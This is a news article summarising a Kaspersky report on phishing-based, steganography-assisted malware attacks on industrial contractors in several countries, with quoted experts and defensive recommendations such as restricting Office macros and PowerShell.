Cybersecurity company Kaspersky released a report looking at a series of targeted attacks on different countries around the globe. The cyber attacks targeted industrial equipment suppliers and software providers.
The malware attacks targeted systems in Japan, Italy, German and the United Kingdom. The attackers used techniques including malicious Microsoft Office documents and PowerShell scripts, to thwart detection and analysis attempts. They also used the steganography technique to conceal messages within digital files.
“This attack attracted attention due to several, non-standard technical solutions used by the attackers,” said Vyacheslav Kopeytsev, a security expert at Kaspersky. “For instance, the malware module is encoded inside the image using steganography methods, and the image itself is hosted on legitimate web resources. This makes it almost impossible to detect the download of such malware using network traffic monitoring and control tools. From the point of view of technical solutions, such activity does not differ from the usual access given to legitimate image hosting. Coupled with the targeted nature of infections, these techniques indicate the sophisticated and selective nature of these attacks.”
In order to gain access, the attackers used phishing emails tailored for each specific victim. The malware would only initiate it’s destructive activity if the operating system had a localization that matched the language used in the phishing email.
According to the report, attackers used the password exploitation tool Mimikatz to steal the authentication data of Windows accounts stored on a compromised system. Kaspersky experts say this information can be used by attackers to gain access to other systems within an enterprise network and develop attacks.
“It is a matter of concern that industrial contractors are among the victims of the attack,” Kopeytsev said. “If the authentication data of employees of the contractor organization falls into malicious hands, this can lead to many negative consequences, starting with the theft of confidential data and ending with attacks on industrial enterprises through remote administration tools used by the contractor.”
In addition to their findings about the attacks targeting industrial equipment suppliers and software providers, Kaspersky’s report includes a series of recommendations for industrial organizations working to reduce their risk of being attacked. In relation to these attacks specifically, organizations should restrict the execution of macros in Microsoft Office documents, restrict the execution of PowerShell scripts when possible and pay particular attention to PowerShell process startup events initiated by Microsoft Office applications.
Additionally, Kaspersky recommends organizations install a security solution for corporate endpoints. They also recommend installing security solutions for operational technology endpoints and networks to ensure comprehensive protection for all industry critical systems.
“The attack on contractors once again demonstrates that for electric power facilities to be operated reliably, it is critically important to ensure workstations and servers are protected – both on corporate and operational technology networks,” said Anton Shipulin, solution business lead, Kaspersky Industrial CyberSecurity. “Although strong endpoint protection may be enough to prevent similar attacks, in this case, we still recommend using the most comprehensive approach to support the industrial facility’s cyber-defense. Attacks through contractors and suppliers can have completely different entry points within the enterprise, including ones on the OT network.”
Kaspersky also suggests organizations provide email security training to employees, with particular emphasis on learning how to identify phishing emails. Additionally, if an organization suspects their system has been infected, they should immediately perform an antivirus check and force password changes for all accounts that were used to log in on compromised systems.
“Even though the attack’s objectives remained unclear, it is more accurate to follow the assumption that attackers have the potential to gain access to the facility’s critical systems,” Shipulin said. “Modern means of network monitoring, anomaly and attack detection can help to detect signs of an attack on industrial control systems and equipment in a timely manner, and prevent a possible incident.”